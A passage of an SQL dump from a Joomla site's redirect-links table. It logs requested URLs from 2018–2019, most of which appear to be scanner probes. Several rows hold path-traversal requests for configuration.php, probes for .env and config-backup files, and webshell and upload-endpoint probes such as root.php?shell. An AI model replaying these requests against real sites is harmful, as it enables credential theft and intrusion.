00:00:00',301),(14111,'http://ekvatorprint.com.ua/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2018-11-28 00:23:12','0000-00-00 00:00:00',301),(14112,'http://ekvatorprint.com.ua/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../configuration.php',NULL,'','',1,0,'2018-11-28 00:23:12','0000-00-00 00:00:00',301),(14113,'http://ekvatorprint.com.ua/plugins/system/cssjscompress/js.php?js=../../configuration.php',NULL,'','',1,0,'2018-11-28 00:23:13','0000-00-00 00:00:00',301),(14114,'http://ekvatorprint.com.ua/index.php?option=com_xcomp&controller=../../configuration.php',NULL,'','',1,0,'2018-11-28 00:23:13','0000-00-00 00:00:00',301);
INSERT INTO `j25_redirect_links` VALUES (14115,'http://ekvatorprint.com.ua/index.php?option=com_jimtawl&itemid=12&task=../../../../../../../../../../../../../../../configuration.php',NULL,'','',1,0,'2018-11-28 00:23:13','0000-00-00 00:00:00',301),(14116,'http://ekvatorprint.com.ua/components/com_docman/dl2.php?archive=0&file=../../configuration.php',NULL,'','',1,0,'2018-11-28 00:23:13','0000-00-00 00:00:00',301),(14117,'http://ekvatorprint.com.ua/.env_baremental',NULL,'','',1,0,'2018-11-29 10:48:11','0000-00-00 00:00:00',301),(14118,'http://ekvatorprint.com.ua/.env_development',NULL,'','',1,0,'2018-11-29 10:48:11','0000-00-00 00:00:00',301),(14119,'http://ekvatorprint.com.ua/.env_hosted',NULL,'','',1,0,'2018-11-29 10:48:12','0000-00-00 00:00:00',301),(14120,'http://ekvatorprint.com.ua/.env_local',NULL,'','',1,0,'2018-11-29 10:48:13','0000-00-00 00:00:00',301),(14121,'http://ekvatorprint.com.ua/.env_production',NULL,'','',2,0,'2018-11-29 10:48:13','0000-00-00 00:00:00',301),(14122,'http://ekvatorprint.com.ua/.env_staging',NULL,'','',1,0,'2018-11-29 10:48:13','0000-00-00 00:00:00',301),(14123,'http://ekvatorprint.com.ua/plus/ad_js.php',NULL,'','',1,0,'2018-12-02 16:04:57','0000-00-00 00:00:00',301),(14124,'http://ekvatorprint.com.ua/p\n		<!--',NULL,'','',2,0,'2018-12-04 01:46:10','0000-00-00 00:00:00',301),(14125,'http://ekvatorprint.com.ua/.well-known/security.txt',NULL,'','',30,0,'2018-12-04 04:29:45','0000-00-00 00:00:00',301),(14126,'http://ekvatorprint.com.ua/sites/all/libraries/plupload/examples/upload.php',NULL,'http://ekvatorprint.com.ua/sites/all/libraries/plupload/examples/upload.php','',2,0,'2018-12-06 08:18:51','0000-00-00 00:00:00',301),(14127,'http://ekvatorprint.com.ua/banner-printing++++++++++++++++++++++++[+?????????+]',NULL,'http://ekvatorprint.com.ua/banner-printing++++++++++++++++++++++++[+%C0%EA%F2%E8%E2%E0%F6%E8%FF+]','',16,0,'2018-12-06 18:17:27','0000-00-00 00:00:00',301),(14128,'http://ekvatorprint.com.ua//admin/images/cal_date_over.gif',NULL,'','',1,0,'2018-12-07 12:34:03','0000-00-00 00:00:00',301),(14129,'http://ekvatorprint.com.ua/sites/default/libraries/plupload/examples/upload.php',NULL,'http://ekvatorprint.com.ua/sites/default/libraries/plupload/examples/upload.php','',1,0,'2018-12-08 02:28:03','0000-00-00 00:00:00',301),(14130,'http://ekvatorprint.com.ua/modules/plupload/examples/upload.php',NULL,'http://ekvatorprint.com.ua/modules/plupload/examples/upload.php','',1,0,'2018-12-08 02:28:03','0000-00-00 00:00:00',301),(14131,'http://ekvatorprint.com.ua/sites/all/modules/plupload/examples/upload.php',NULL,'http://ekvatorprint.com.ua/sites/all/modules/plupload/examples/upload.php','',1,0,'2018-12-08 02:28:04','0000-00-00 00:00:00',301),(14132,'http://ekvatorprint.com.ua/sites/all/libraries/_plupload/examples/upload.php',NULL,'http://ekvatorprint.com.ua/sites/all/libraries/_plupload/examples/upload.php','',1,0,'2018-12-08 02:28:04','0000-00-00 00:00:00',301),(14133,'http://ekvatorprint.com.ua/images/banners/banner.php',NULL,'','',2,0,'2018-12-08 14:26:36','0000-00-00 00:00:00',301),(14134,'http://ekvatorprint.com.ua/.config.php',NULL,'','',3,0,'2018-12-08 14:26:37','0000-00-00 00:00:00',301),(14135,'http://ekvatorprint.com.ua/.joomla.system.php',NULL,'','',2,0,'2018-12-08 14:26:38','0000-00-00 00:00:00',301),(14136,'http://ekvatorprint.com.ua/cache/joomlacache.php',NULL,'','',3,0,'2018-12-08 14:26:40','0000-00-00 00:00:00',301),(14137,'http://ekvatorprint.com.ua/ckeditor/post.php',NULL,'','',3,0,'2018-12-08 14:26:40','0000-00-00 00:00:00',301),(14138,'http://ekvatorprint.com.ua/components/a.php',NULL,'','',2,0,'2018-12-08 14:26:41','0000-00-00 00:00:00',301),(14139,'http://ekvatorprint.com.ua/includes/litecache.php',NULL,'','',2,0,'2018-12-08 14:26:41','0000-00-00 00:00:00',301),(14140,'http://ekvatorprint.com.ua/modules/modules/joomla-resize.php',NULL,'','',2,0,'2018-12-08 14:26:42','0000-00-00 00:00:00',301),(14141,'http://ekvatorprint.com.ua/modules/modules/path.php',NULL,'','',2,0,'2018-12-08 14:26:42','0000-00-00 00:00:00',301),(14142,'http://ekvatorprint.com.ua/plugins/.joomla.system.php',NULL,'','',2,0,'2018-12-08 14:26:43','0000-00-00 00:00:00',301),(14143,'http://ekvatorprint.com.ua/tmp/hello.php',NULL,'','',2,0,'2018-12-08 14:26:43','0000-00-00 00:00:00',301),(14144,'http://ekvatorprint.com.ua/tmp/xmlrpc.php',NULL,'','',2,0,'2018-12-08 14:26:44','0000-00-00 00:00:00',301),(14145,'http://ekvatorprint.com.ua/cache/gadeyuvz.php',NULL,'','',3,0,'2018-12-08 14:26:46','0000-00-00 00:00:00',301),(14146,'http://ekvatorprint.com.ua/cache/qlxlykva.php',NULL,'','',3,0,'2018-12-08 14:26:46','0000-00-00 00:00:00',301),(14147,'http://ekvatorprint.com.ua/aqchmesl.php',NULL,'','',3,0,'2018-12-08 14:26:46','0000-00-00 00:00:00',301),(14148,'http://ekvatorprint.com.ua/administrator/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:49','0000-00-00 00:00:00',301),(14149,'http://ekvatorprint.com.ua/cache/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:49','0000-00-00 00:00:00',301),(14150,'http://ekvatorprint.com.ua/components/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:50','0000-00-00 00:00:00',301),(14151,'http://ekvatorprint.com.ua/includes/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:50','0000-00-00 00:00:00',301),(14152,'http://ekvatorprint.com.ua/language/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:51','0000-00-00 00:00:00',301),(14153,'http://ekvatorprint.com.ua/libraries/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:51','0000-00-00 00:00:00',301),(14154,'http://ekvatorprint.com.ua/media/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:52','0000-00-00 00:00:00',301),(14155,'http://ekvatorprint.com.ua/modules/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:52','0000-00-00 00:00:00',301),(14156,'http://ekvatorprint.com.ua/templates/wp-up.php',NULL,'','',3,0,'2018-12-08 14:26:52','0000-00-00 00:00:00',301),(14157,'http://ekvatorprint.com.ua/seo_script.php',NULL,'','',4,0,'2018-12-08 14:26:53','0000-00-00 00:00:00',301),(14158,'http://ekvatorprint.com.ua/wp-logos.php',NULL,'','',1,0,'2018-12-08 19:44:25','0000-00-00 00:00:00',301),(14159,'http://ekvatorprint.com.ua/components/com_banners/metadata.php',NULL,'ekvatorprint.com.ua','',2,0,'2018-12-10 11:56:17','0000-00-00 00:00:00',301),(14160,'http://ekvatorprint.com.ua/wp-ajax-hook.php',NULL,'','',1,0,'2018-12-13 10:48:58','0000-00-00 00:00:00',301),(14161,'http://ekvatorprint.com.ua/public/index.php',NULL,'','',1,0,'2018-12-14 09:17:02','0000-00-00 00:00:00',301),(14162,'http://ekvatorprint.com.ua/wp-loadsnew.php',NULL,'','',1,0,'2018-12-14 22:49:42','0000-00-00 00:00:00',301),(14163,'http://ekvatorprint.com.ua/wp-load-5b7a23c0744615b7a23c0744af.php',NULL,'','',1,0,'2018-12-15 07:40:08','0000-00-00 00:00:00',301),(14164,'http://ekvatorprint.com.ua/data/common.inc.php',NULL,'','',2,0,'2018-12-16 00:48:34','0000-00-00 00:00:00',301),(14165,'http://ekvatorprint.com.ua/bitrix/modules/main/include/prolog.php',NULL,'','',1,0,'2018-12-16 06:41:25','0000-00-00 00:00:00',301),(14166,'http://ekvatorprint.com.ua/wp-cson.php?canshu=1',NULL,'','',1,0,'2018-12-19 08:29:17','0000-00-00 00:00:00',301),(14167,'http://ekvatorprint.com.ua/cache/seo_script.php',NULL,'','',1,0,'2018-12-19 11:35:29','0000-00-00 00:00:00',301),(14168,'http://ekvatorprint.com.ua/wp-includse.php?script=1',NULL,'','',1,0,'2018-12-19 21:09:46','0000-00-00 00:00:00',301),(14169,'http://ekvatorprint.com.ua/system/storage/logs/seo_script.php',NULL,'','',1,0,'2018-12-19 22:44:42','0000-00-00 00:00:00',301),(14170,'http://ekvatorprint.com.ua/ludk.php',NULL,'','',1,0,'2018-12-20 01:41:13','0000-00-00 00:00:00',301),(14171,'http://ekvatorprint.com.ua/system/logs/seo_script.php',NULL,'','',1,0,'2018-12-20 13:40:20','0000-00-00 00:00:00',301),(14172,'http://ekvatorprint.com.ua/components/com_myblog/defines.myblog.php',NULL,'','',1,0,'2018-12-21 07:48:37','0000-00-00 00:00:00',301),(14173,'http://ekvatorprint.com.ua/root.php?shell',NULL,'','',3,0,'2018-12-21 15:15:59','0000-00-00 00:00:00',301),(14174,'http://ekvatorprint.com.ua/wp-content/themes/twentyten/style.css',NULL,'','',1,0,'2018-12-21 16:32:43','0000-00-00 00:00:00',301),(14175,'http://ekvatorprint.com.ua/router.php',NULL,'','',1,0,'2018-12-21 17:07:19','0000-00-00 00:00:00',301),(14176,'http://ekvatorprint.com.ua/st.php',NULL,'','',1,0,'2018-12-22 05:18:39','0000-00-00 00:00:00',301),(14177,'http://ekvatorprint.com.ua/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'','',2,0,'2018-12-22 13:28:42','0000-00-00 00:00:00',301),(14178,'http://ekvatorprint.com.ua/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'','',2,0,'2018-12-22 13:28:43','0000-00-00 00:00:00',301),(14179,'http://ekvatorprint.com.ua/assets/jquery-file-upload/server/php/index.php',NULL,'','',2,0,'2018-12-22 13:28:44','0000-00-00 00:00:00',301),(14180,'http://ekvatorprint.com.ua/phpformbuilder/plugins/jquery-file-upload/server/php/index.php',NULL,'','',2,0,'2018-12-22 13:28:45','0000-00-00 00:00:00',301),(14181,'http://ekvatorprint.com.ua/images/ui-icons_444444_256x240.png',NULL,'http://ekvatorprint.com.ua/print-billboards','',4,0,'2018-12-22 21:32:35','0000-00-00 00:00:00',301),(14182,'http://ekvatorprint.com.ua/bitrix/admin/seo_script.php',NULL,'','',1,0,'2018-12-24 13:16:34','0000-00-00 00:00:00',301),(14183,'http://ekvatorprint.com.ua/admin/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-24 23:54:22','0000-00-00 00:00:00',301),(14184,'http://ekvatorprint.com.ua/admin_area/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-24 23:54:23','0000-00-00 00:00:00',301),(14185,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-24 23:54:23','0000-00-00 00:00:00',301),(14186,'http://ekvatorprint.com.ua/wp-kidmx.php?script=1',NULL,'','',1,0,'2018-12-25 00:13:22','0000-00-00 00:00:00',301),(14187,'http://ekvatorprint.com.ua/images/jsspwneed.php',NULL,'','',2,0,'2018-12-25 13:55:42','0000-00-00 00:00:00',301),(14188,'http://ekvatorprint.com.ua/forum/cache/licence.php',NULL,'','',1,0,'2018-12-26 00:29:22','0000-00-00 00:00:00',301),(14189,'http://ekvatorprint.com.ua/stats/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 00:29:23','0000-00-00 00:00:00',301),(14190,'http://ekvatorprint.com.ua/core.php',NULL,'','',1,0,'2018-12-26 00:29:23','0000-00-00 00:00:00',301),(14191,'http://ekvatorprint.com.ua/wp-pot.php',NULL,'','',1,0,'2018-12-26 00:29:24','0000-00-00 00:00:00',301),(14192,'http://ekvatorprint.com.ua/wp-xrp.php',NULL,'','',1,0,'2018-12-26 00:29:25','0000-00-00 00:00:00',301),(14193,'http://ekvatorprint.com.ua/cache_.php',NULL,'','',1,0,'2018-12-26 00:29:25','0000-00-00 00:00:00',301),(14194,'http://ekvatorprint.com.ua/_private/license.php',NULL,'','',1,0,'2018-12-26 00:29:26','0000-00-00 00:00:00',301),(14195,'http://ekvatorprint.com.ua/logs/license.php',NULL,'','',1,0,'2018-12-26 00:29:26','0000-00-00 00:00:00',301),(14196,'http://ekvatorprint.com.ua/templates/license.php',NULL,'','',1,0,'2018-12-26 00:29:27','0000-00-00 00:00:00',301),(14197,'http://ekvatorprint.com.ua/components/license.php',NULL,'','',1,0,'2018-12-26 00:29:28','0000-00-00 00:00:00',301),(14198,'http://ekvatorprint.com.ua/wp-content/plugins/license.php',NULL,'','',1,0,'2018-12-26 00:29:28','0000-00-00 00:00:00',301),(14199,'http://ekvatorprint.com.ua/language/en-gb/license.php',NULL,'','',1,0,'2018-12-26 00:29:28','0000-00-00 00:00:00',301),(14200,'http://ekvatorprint.com.ua/calc/new_license.php',NULL,'','',1,0,'2018-12-26 00:29:29','0000-00-00 00:00:00',301),(14201,'http://ekvatorprint.com.ua/js/content-post.php',NULL,'','',1,0,'2018-12-26 00:29:30','0000-00-00 00:00:00',301),(14202,'http://ekvatorprint.com.ua/wp-cofigs.php',NULL,'','',1,0,'2018-12-26 00:29:30','0000-00-00 00:00:00',301),(14203,'http://ekvatorprint.com.ua/pages/content-post.php',NULL,'','',1,0,'2018-12-26 00:29:30','0000-00-00 00:00:00',301),(14204,'http://ekvatorprint.com.ua/tmp/content-post.php',NULL,'','',1,0,'2018-12-26 00:29:31','0000-00-00 00:00:00',301),(14205,'http://ekvatorprint.com.ua/templates/content-post.php',NULL,'','',1,0,'2018-12-26 00:29:31','0000-00-00 00:00:00',301),(14206,'http://ekvatorprint.com.ua/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:32','0000-00-00 00:00:00',301),(14207,'http://ekvatorprint.com.ua/logs/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:32','0000-00-00 00:00:00',301),(14208,'http://ekvatorprint.com.ua/components/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:32','0000-00-00 00:00:00',301),(14209,'http://ekvatorprint.com.ua/cgi/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:33','0000-00-00 00:00:00',301),(14210,'http://ekvatorprint.com.ua/tmp/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:33','0000-00-00 00:00:00',301),(14211,'http://ekvatorprint.com.ua/templates/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:33','0000-00-00 00:00:00',301),(14212,'http://ekvatorprint.com.ua/modules/newsleter.php',NULL,'','',1,0,'2018-12-26 00:29:34','0000-00-00 00:00:00',301),(14213,'http://ekvatorprint.com.ua/js/wp-single.php',NULL,'','',1,0,'2018-12-26 00:29:34','0000-00-00 00:00:00',301),(14214,'http://ekvatorprint.com.ua/validate.php',NULL,'','',1,0,'2018-12-26 00:29:35','0000-00-00 00:00:00',301),(14215,'http://ekvatorprint.com.ua/wp_interst.php?passwd=123456&action=redate&readfile=wp_interst.php',NULL,'','',1,0,'2018-12-26 00:29:36','0000-00-00 00:00:00',301),(14216,'http://ekvatorprint.com.ua/administrator/cache/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 00:29:36','0000-00-00 00:00:00',301),(14217,'http://ekvatorprint.com.ua/cache/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 00:29:36','0000-00-00 00:00:00',301),(14218,'http://ekvatorprint.com.ua/cache/sq.php',NULL,'','',1,0,'2018-12-26 00:29:37','0000-00-00 00:00:00',301),(14219,'http://ekvatorprint.com.ua/templates/sq.php',NULL,'','',1,0,'2018-12-26 00:29:37','0000-00-00 00:00:00',301),(14220,'http://ekvatorprint.com.ua/tmp/sq.php',NULL,'','',1,0,'2018-12-26 00:29:38','0000-00-00 00:00:00',301),(14221,'http://ekvatorprint.com.ua/images/sq.php',NULL,'','',1,0,'2018-12-26 00:29:38','0000-00-00 00:00:00',301),(14222,'http://ekvatorprint.com.ua/logs/sq.php',NULL,'','',1,0,'2018-12-26 00:29:38','0000-00-00 00:00:00',301),(14223,'http://ekvatorprint.com.ua/modules/sq.php',NULL,'','',1,0,'2018-12-26 00:29:39','0000-00-00 00:00:00',301),(14224,'http://ekvatorprint.com.ua/administrator/help/wp-infos.php',NULL,'','',1,0,'2018-12-26 00:29:39','0000-00-00 00:00:00',301),(14225,'http://ekvatorprint.com.ua/modules/wp-infos.php',NULL,'','',1,0,'2018-12-26 00:29:39','0000-00-00 00:00:00',301),(14226,'http://ekvatorprint.com.ua/tmp/wp-infos.php',NULL,'','',1,0,'2018-12-26 00:29:40','0000-00-00 00:00:00',301),(14227,'http://ekvatorprint.com.ua/templates/wp-infos.php',NULL,'','',1,0,'2018-12-26 00:29:40','0000-00-00 00:00:00',301),(14228,'http://ekvatorprint.com.ua/administrator/wp-infos.php',NULL,'','',1,0,'2018-12-26 00:29:40','0000-00-00 00:00:00',301),(14229,'http://ekvatorprint.com.ua/cli/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 00:29:41','0000-00-00 00:00:00',301),(14230,'http://ekvatorprint.com.ua/logs/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 00:29:41','0000-00-00 00:00:00',301),(14231,'http://ekvatorprint.com.ua/modules/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 00:29:41','0000-00-00 00:00:00',301),(14232,'http://ekvatorprint.com.ua/cli/sq.php',NULL,'','',1,0,'2018-12-26 00:29:42','0000-00-00 00:00:00',301),(14233,'http://ekvatorprint.com.ua/index.php?option=com_contentview=articleid=12itemid=13',NULL,'','',1,0,'2018-12-26 03:04:42','0000-00-00 00:00:00',301),(14234,'http://ekvatorprint.com.ua/index.php?option=com_contentamp;view=articleamp;id=11amp;itemid=12',NULL,'','',1,0,'2018-12-26 03:04:49','0000-00-00 00:00:00',301),(14235,'http://ekvatorprint.com.ua/connectors/resource/seo_script.php',NULL,'','',1,0,'2018-12-26 11:54:04','0000-00-00 00:00:00',301),(14236,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-zaka',NULL,'','',2,0,'2018-12-27 12:11:14','0000-00-00 00:00:00',301),(14237,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-z',NULL,'','',1,0,'2018-12-27 12:11:14','0000-00-00 00:00:00',301),(14238,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za',NULL,'','',1,0,'2018-12-27 12:11:14','0000-00-00 00:00:00',301),(14239,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-z',NULL,'','',1,0,'2018-12-27 12:11:14','0000-00-00 00:00:00',301),(14240,'http://ekvatorprint.com.ua/kak-podtverdit-oplat',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14241,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-zak',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14242,'http://ekvatorprint.com.ua/kak-podtverdit-opl',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14243,'http://ekvatorprint.com.ua/kak-podtverdit-',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14244,'http://ekvatorprint.com.ua/kak-podtverdit-o',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14245,'http://ekvatorprint.com.ua/kak-podtverdit-op',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14246,'http://ekvatorprint.com.ua/kak-podtverdi',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14247,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14248,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-za',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14249,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu',NULL,'','',1,0,'2018-12-27 12:11:15','0000-00-00 00:00:00',301),(14250,'http://ekvatorprint.com.ua/kak-podtverdit-oplatu-',NULL,'','',1,0,'2018-12-27 12:11:16','0000-00-00 00:00:00',301),(14251,'http://ekvatorprint.com.ua/kak-podtverdit-opla',NULL,'','',1,0,'2018-12-27 12:11:16','0000-00-00 00:00:00',301),(14252,'http://ekvatorprint.com.ua/kak-podtverdit',NULL,'','',1,0,'2018-12-27 12:11:16','0000-00-00 00:00:00',301),(14253,'http://ekvatorprint.com.ua/pric',NULL,'','',1,0,'2018-12-27 14:14:00','0000-00-00 00:00:00',301),(14254,'http://ekvatorprint.com.ua/wp-content_plugins_akismet_widget.php',NULL,'','',1,0,'2018-12-29 06:31:42','0000-00-00 00:00:00',301),(14255,'http://ekvatorprint.com.ua/ciosan.php',NULL,'','',1,0,'2018-12-31 11:12:40','0000-00-00 00:00:00',301),(14256,'http://ekvatorprint.com.ua/components/com_foxcontact/css/naked.css',NULL,'','',1,0,'2018-12-31 17:15:55','0000-00-00 00:00:00',301),(14257,'http://ekvatorprint.com.ua/admin/language/english/total/seo_script.php',NULL,'','',1,0,'2018-12-31 21:30:28','0000-00-00 00:00:00',301),(14258,'http://ekvatorprint.com.ua/imprima.php',NULL,'','',1,0,'2018-12-31 23:57:22','0000-00-00 00:00:00',301),(14259,'http://ekvatorprint.com.ua/e/epassport/index.php',NULL,'','',1,0,'2019-01-01 17:27:35','0000-00-00 00:00:00',301),(14260,'http://ekvatorprint.com.ua/bps.php',NULL,'','',1,0,'2019-01-02 17:09:54','0000-00-00 00:00:00',301),(14261,'http://ekvatorprint.com.ua/index.php?option=com_virtuemart&page=shop.registration',NULL,'','',1,0,'2019-01-02 22:30:17','0000-00-00 00:00:00',301),(14262,'http://ekvatorprint.com.ua/components/com_fabrik/views/element/metadata.xml',NULL,'','',1,0,'2019-01-03 00:32:58','0000-00-00 00:00:00',301),(14263,'http://ekvatorprint.com.ua/brandtalk/administrator/component/w6360n.php.php',NULL,'','',1,0,'2019-01-03 05:14:48','0000-00-00 00:00:00',301),(14264,'http://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php','',1,0,'2019-01-03 09:21:49','0000-00-00 00:00:00',301),(14265,'http://ekvatorprint.com.ua/wp-content/plugins/dopts/',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/dopts/','',1,0,'2019-01-05 13:52:38','0000-00-00 00:00:00',301),(14266,'http://ekvatorprint.com.ua/uptimebot',NULL,'','',2,0,'2019-01-05 19:18:40','0000-00-00 00:00:00',301),(14267,'http://ekvatorprint.com.ua/uptimebotorg',NULL,'','',2,0,'2019-01-05 19:18:41','0000-00-00 00:00:00',301),(14268,'http://ekvatorprint.com.ua/uptimebot.org',NULL,'','',2,0,'2019-01-05 19:18:42','0000-00-00 00:00:00',301),(14269,'http://ekvatorprint.com.ua/http:/uptimebot.org',NULL,'','',2,0,'2019-01-05 19:18:42','0000-00-00 00:00:00',301),(14270,'http://ekvatorprint.com.ua/uptimebot-org',NULL,'','',2,0,'2019-01-05 19:18:42','0000-00-00 00:00:00',301),(14271,'http://ekvatorprint.com.ua/uptimebot_org',NULL,'','',2,0,'2019-01-05 19:18:43','0000-00-00 00:00:00',301),(14272,'http://ekvatorprint.com.ua/uptimebot%org',NULL,'','',2,0,'2019-01-05 19:18:43','0000-00-00 00:00:00',301),(14273,'http://ekvatorprint.com.ua/uptimebot+org',NULL,'','',2,0,'2019-01-05 19:18:44','0000-00-00 00:00:00',301),(14274,'http://ekvatorprint.com.ua/uptimebot/org',NULL,'','',2,0,'2019-01-05 19:18:44','0000-00-00 00:00:00',301),(14275,'http://ekvatorprint.com.ua/uptimebot.php',NULL,'','',2,0,'2019-01-05 19:18:44','0000-00-00 00:00:00',301),(14276,'http://ekvatorprint.com.ua/uptimebotorg.php',NULL,'','',2,0,'2019-01-05 19:18:45','0000-00-00 00:00:00',301),(14277,'http://ekvatorprint.com.ua/uptimebot.org.php',NULL,'','',2,0,'2019-01-05 19:18:45','0000-00-00 00:00:00',301),(14278,'http://ekvatorprint.com.ua/http:/uptimebot.org.php',NULL,'','',2,0,'2019-01-05 19:18:45','0000-00-00 00:00:00',301),(14279,'http://ekvatorprint.com.ua/uptimebot-org.php',NULL,'','',2,0,'2019-01-05 19:18:46','0000-00-00 00:00:00',301),(14280,'http://ekvatorprint.com.ua/uptimebot_org.php',NULL,'','',2,0,'2019-01-05 19:18:46','0000-00-00 00:00:00',301),(14281,'http://ekvatorprint.com.ua/uptimebot%org.php',NULL,'','',2,0,'2019-01-05 19:18:47','0000-00-00 00:00:00',301),(14282,'http://ekvatorprint.com.ua/uptimebot+org.php',NULL,'','',2,0,'2019-01-05 19:18:47','0000-00-00 00:00:00',301),(14283,'http://ekvatorprint.com.ua/uptimebot/org.php',NULL,'','',2,0,'2019-01-05 19:18:48','0000-00-00 00:00:00',301),(14284,'http://ekvatorprint.com.ua/org.php',NULL,'','',2,0,'2019-01-05 19:18:48','0000-00-00 00:00:00',301),(14285,'http://ekvatorprint.com.ua/wp-config.php.new',NULL,'','',1,0,'2019-01-06 03:56:04','0000-00-00 00:00:00',301),(14286,'http://ekvatorprint.com.ua/wp-config.php_new',NULL,'','',1,0,'2019-01-06 03:56:05','0000-00-00 00:00:00',301),(14287,'http://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=zkdwqlrq.gq',NULL,'','',2,0,'2019-01-06 14:37:49','0000-00-00 00:00:00',301),(14288,'http://ekvatorprint.com.ua//js/uploadify/uploadify.css',NULL,'','',1,0,'2019-01-08 02:44:39','0000-00-00 00:00:00',301),(14289,'http://ekvatorprint.com.ua/contact_us.php',NULL,'','',2,0,'2019-01-08 09:08:44','0000-00-00 00:00:00',301),(14290,'http://ekvatorprint.com.ua//uploadify/uploadify.css',NULL,'','',1,0,'2019-01-08 20:56:42','0000-00-00 00:00:00',301),(14291,'http://ekvatorprint.com.ua/videochat/handlers/upload.handler.php',NULL,'','',2,0,'2019-01-14 17:40:45','0000-00-00 00:00:00',301),(14292,'http://ekvatorprint.com.ua/\"/images/click2.png',NULL,'http://ekvatorprint.com.ua/administrator/index.php?option=com_modules&view=module&layout=edit&id=92','',3,0,'2019-01-15 11:24:58','0000-00-00 00:00:00',301),(14293,'http://ekvatorprint.com.ua/contacts/templates/gk_ilife/favicon.ico',NULL,'','',12,0,'2019-01-15 20:55:26','0000-00-00 00:00:00',301),(14294,'http://ekvatorprint.com.ua/chat71/handlers/upload.handler.php',NULL,'','',1,0,'2019-01-16 19:51:49','0000-00-00 00:00:00',301),(14295,'http://ekvatorprint.com.ua/wp-content/plugins/wp-formgenerator/changelog.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-formgenerator/changelog.txt','',2,0,'2019-01-19 14:31:12','0000-00-00 00:00:00',301),(14296,'http://ekvatorprint.com.ua/2010-12-01-14-37-59',NULL,'','',3,0,'2019-01-21 16:36:58','0000-00-00 00:00:00',301),(14297,'http://ekvatorprint.com.ua/2010-11-06-16-27-54',NULL,'','',1,0,'2019-01-21 16:37:34','0000-00-00 00:00:00',301),(14298,'http://ekvatorprint.com.ua/2010-12-06-15-15-58',NULL,'','',1,0,'2019-01-21 16:39:39','0000-00-00 00:00:00',301),(14299,'http://ekvatorprint.com.ua/chat7/handlers/upload.handler.php',NULL,'','',1,0,'2019-01-21 18:46:40','0000-00-00 00:00:00',301),(14300,'http://ekvatorprint.com.ua/5-2010-12-01-14-37-59',NULL,'','',24,0,'2019-01-24 10:36:50','0000-00-00 00:00:00',301),(14301,'http://ekvatorprint.com.ua/printing-on-canvas-сайт',NULL,'','',10,0,'2019-01-25 14:21:34','0000-00-00 00:00:00',301),(14302,'http://ekvatorprint.com.ua/configuration-backup1.txt',NULL,'','',1,0,'2019-01-28 10:53:26','0000-00-00 00:00:00',301),(14303,'http://ekvatorprint.com.ua/configuration fix.txt',NULL,'','',1,0,'2019-01-28 10:53:27','0000-00-00 00:00:00',301),(14304,'http://ekvatorprint.com.ua/configuration.bak',NULL,'','',1,0,'2019-01-28 10:53:28','0000-00-00 00:00:00',301),(14305,'http://ekvatorprint.com.ua/configuration.',NULL,'','',1,0,'2019-01-28 10:53:30','0000-00-00 00:00:00',301),(14306,'http://ekvatorprint.com.ua/configuration-backup.txt',NULL,'','',1,0,'2019-01-28 10:53:30','0000-00-00 